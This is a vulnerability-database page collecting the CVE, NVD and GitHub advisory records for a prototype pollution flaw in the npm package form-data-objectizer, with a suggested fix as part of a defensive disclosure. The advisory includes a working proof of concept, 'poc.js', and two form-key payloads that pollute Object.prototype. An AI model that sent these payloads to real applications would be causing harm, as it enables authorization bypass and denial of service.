Vulnerability-Lookup

CVE-2026-46510 (GCVE-0-2026-46510)

Vulnerability from cvelistv5 – Published: 2026-05-29 13:40 – Updated: 2026-05-29 13:40

Title

Prototype pollution in form-data-objectizer via bracket-notation form keys

Summary

form-data-objectizer converts FormData to object. Prior to 1.0.1, form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process. This vulnerability is fixed in 1.0.1.

Severity

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

CWE

CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/kaspernj/form-data-objectizer/…	x_refsource_CONFIRM
https://github.com/kaspernj/form-data-objectizer/…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
kaspernj	form-data-objectizer	Affected: < 1.0.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "form-data-objectizer",
          "vendor": "kaspernj",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "form-data-objectizer converts FormData to object. Prior to 1.0.1, form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process. This vulnerability is fixed in 1.0.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-29T13:40:22.772Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq"
        },
        {
          "name": "https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc"
        }
      ],
      "source": {
        "advisory": "GHSA-m2hg-wjq3-28wq",
        "discovery": "UNKNOWN"
      },
      "title": "Prototype pollution in form-data-objectizer via bracket-notation form keys"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-46510",
    "datePublished": "2026-05-29T13:40:22.772Z",
    "dateReserved": "2026-05-14T19:12:32.754Z",
    "dateUpdated": "2026-05-29T13:40:22.772Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-46510\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-29T14:16:31.807\",\"lastModified\":\"2026-05-29T14:16:31.807\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"form-data-objectizer converts FormData to object. Prior to 1.0.1, form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process. This vulnerability is fixed in 1.0.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"references\":[{\"url\":\"https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-46510

Vulnerability from fkie_nvd - Published: 2026-05-29 14:16 - Updated: 2026-05-29 14:16

Severity

8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc
	security-advisories@github.com	https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "form-data-objectizer converts FormData to object. Prior to 1.0.1, form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process. This vulnerability is fixed in 1.0.1."
    }
  ],
  "id": "CVE-2026-46510",
  "lastModified": "2026-05-29T14:16:31.807",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 8.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-29T14:16:31.807",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-M2HG-WJQ3-28WQ

Vulnerability from github – Published: 2026-05-18 13:28 – Updated: 2026-05-18 13:28

Summary

form-data-objectizer: Prototype pollution in form-data-objectizer via bracket-notation form keys

Details

Summary

form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process.

The bug is in treatInitial and treatSecond inside index.cjs:

if (inputName in result) {           // 'in' walks the prototype chain, so '__proto__' matches
  newResult = result[inputName]      // newResult === Object.prototype
}
// ...
result[key] = value                  // sets the property on Object.prototype

With the form key __proto__[polluted] and value yes:

treatInitial matches inputName = "__proto__", rest = "[polluted]".
"__proto__" in result is true (inherited), so newResult = result["__proto__"], which is Object.prototype.
treatSecond recurses with key = "polluted", newRest = "", and assigns Object.prototype.polluted = "yes".

Affected versions

form-data-objectizer <= 1.0.0 (currently the only published version)

Patched

Not yet. Suggested fix: reject any segment equal to __proto__, constructor, or prototype before walking into result[inputName] / result[key]. Either throw or skip the entry.

Minimum patch in treatInitial and treatSecond:

const REJECT = new Set(['__proto__', 'constructor', 'prototype']);
if (REJECT.has(inputName) || REJECT.has(key)) {
  return; // or throw
}

Using Object.create(null) for the result object would also work since it has no prototype to pollute, but the key === '__proto__' direct write still needs guarding.

Proof of concept

Fresh install on Node 18+:

mkdir pp-fdo && cd pp-fdo
npm init -y
npm install form-data-objectizer@1.0.0

// poc.js
const FormDataToObject = require('form-data-objectizer');

const form = new FormData();
form.append('username', 'alice');
form.append('__proto__[polluted]', 'yes');

FormDataToObject.toObject(form);
console.log(({}).polluted); // -> 'yes'

Observed output:

package version: 1.0.0
before pollution: undefined
after pollution:  yes
parsed data:     { username: 'alice' }
confirmed:       YES, prototype polluted

The field name __proto__[polluted] is the kind of value an attacker can submit from any HTML form or HTTP client. After the call, every plain object in the process inherits polluted = 'yes'. The visible parsed output drops the malicious key, so the attack leaves no obvious trace in request logs that show parsed bodies.

A second working payload is constructor[prototype][polluted]=yes, which walks result.constructor then .prototype.

Impact

Default-reachable prototype pollution via a single unauthenticated HTTP form submission, in any Node.js application that uses form-data-objectizer.toObject() on incoming form data.
Persists for the life of the worker process and affects every subsequent request handled by the same process.
Direct downstream consequences depend on the host application and the rest of its dependency tree, but typical risks include: bypassing if (obj.isAdmin) style checks, injecting unintended config values into objects merged with user input, breaking template rendering, and crashing the worker by polluting properties used by other libraries (DoS).

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L (8.2, High)

Integrity is High because the primitive lets the attacker change the meaning of property reads on every object in the process. Confidentiality is None and Availability is Low without a named downstream gadget; both could be higher in a specific consuming app.

Credit

Reported by Mohamed Bassia (@0xBassia).

Severity

8.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "form-data-objectizer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46510"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T13:28:31Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`form-data-objectizer` walks bracket-notation form keys (e.g. `name[sub]`) into nested objects without filtering `__proto__`, `constructor`, or `prototype`. A single HTTP form field whose name starts with `__proto__[...]` causes the library to mutate `Object.prototype`, which is a prototype pollution primitive of the entire Node.js process.\n\nThe bug is in `treatInitial` and `treatSecond` inside `index.cjs`:\n\n```js\nif (inputName in result) {           // \u0027in\u0027 walks the prototype chain, so \u0027__proto__\u0027 matches\n  newResult = result[inputName]      // newResult === Object.prototype\n}\n// ...\nresult[key] = value                  // sets the property on Object.prototype\n```\n\nWith the form key `__proto__[polluted]` and value `yes`:\n\n1. `treatInitial` matches `inputName = \"__proto__\"`, `rest = \"[polluted]\"`.\n2. `\"__proto__\" in result` is true (inherited), so `newResult = result[\"__proto__\"]`, which is `Object.prototype`.\n3. `treatSecond` recurses with `key = \"polluted\"`, `newRest = \"\"`, and assigns `Object.prototype.polluted = \"yes\"`.\n\n## Affected versions\n\n- `form-data-objectizer` `\u003c= 1.0.0` (currently the only published version)\n\n## Patched\n\nNot yet. Suggested fix: reject any segment equal to `__proto__`, `constructor`, or `prototype` before walking into `result[inputName]` / `result[key]`. Either throw or skip the entry.\n\nMinimum patch in `treatInitial` and `treatSecond`:\n\n```js\nconst REJECT = new Set([\u0027__proto__\u0027, \u0027constructor\u0027, \u0027prototype\u0027]);\nif (REJECT.has(inputName) || REJECT.has(key)) {\n  return; // or throw\n}\n```\n\nUsing `Object.create(null)` for the `result` object would also work since it has no prototype to pollute, but the `key === \u0027__proto__\u0027` direct write still needs guarding.\n\n## Proof of concept\n\nFresh install on Node 18+:\n\n```sh\nmkdir pp-fdo \u0026\u0026 cd pp-fdo\nnpm init -y\nnpm install form-data-objectizer@1.0.0\n```\n\n```js\n// poc.js\nconst FormDataToObject = require(\u0027form-data-objectizer\u0027);\n\nconst form = new FormData();\nform.append(\u0027username\u0027, \u0027alice\u0027);\nform.append(\u0027__proto__[polluted]\u0027, \u0027yes\u0027);\n\nFormDataToObject.toObject(form);\nconsole.log(({}).polluted); // -\u003e \u0027yes\u0027\n```\n\nObserved output:\n\n```\npackage version: 1.0.0\nbefore pollution: undefined\nafter pollution:  yes\nparsed data:     { username: \u0027alice\u0027 }\nconfirmed:       YES, prototype polluted\n```\n\nThe field name `__proto__[polluted]` is the kind of value an attacker can submit from any HTML form or HTTP client. After the call, every plain object in the process inherits `polluted = \u0027yes\u0027`. The visible parsed output drops the malicious key, so the attack leaves no obvious trace in request logs that show parsed bodies.\n\nA second working payload is `constructor[prototype][polluted]=yes`, which walks `result.constructor` then `.prototype`.\n\n## Impact\n\n- Default-reachable prototype pollution via a single unauthenticated HTTP form submission, in any Node.js application that uses `form-data-objectizer.toObject()` on incoming form data.\n- Persists for the life of the worker process and affects every subsequent request handled by the same process.\n- Direct downstream consequences depend on the host application and the rest of its dependency tree, but typical risks include: bypassing `if (obj.isAdmin)` style checks, injecting unintended config values into objects merged with user input, breaking template rendering, and crashing the worker by polluting properties used by other libraries (DoS).\n\n## CVSS\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L` (8.2, High)\n\nIntegrity is High because the primitive lets the attacker change the meaning of property reads on every object in the process. Confidentiality is None and Availability is Low without a named downstream gadget; both could be higher in a specific consuming app.\n\n## Credit\n\nReported by Mohamed Bassia (@0xBassia).",
  "id": "GHSA-m2hg-wjq3-28wq",
  "modified": "2026-05-18T13:28:31Z",
  "published": "2026-05-18T13:28:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kaspernj/form-data-objectizer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "form-data-objectizer: Prototype pollution in form-data-objectizer via bracket-notation form keys"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-46510 (GCVE-0-2026-46510)

FKIE_CVE-2026-46510

GHSA-M2HG-WJQ3-28WQ

Summary

Affected versions

Patched

Proof of concept

Impact

CVSS

Credit

Tags

Sightings

Nomenclature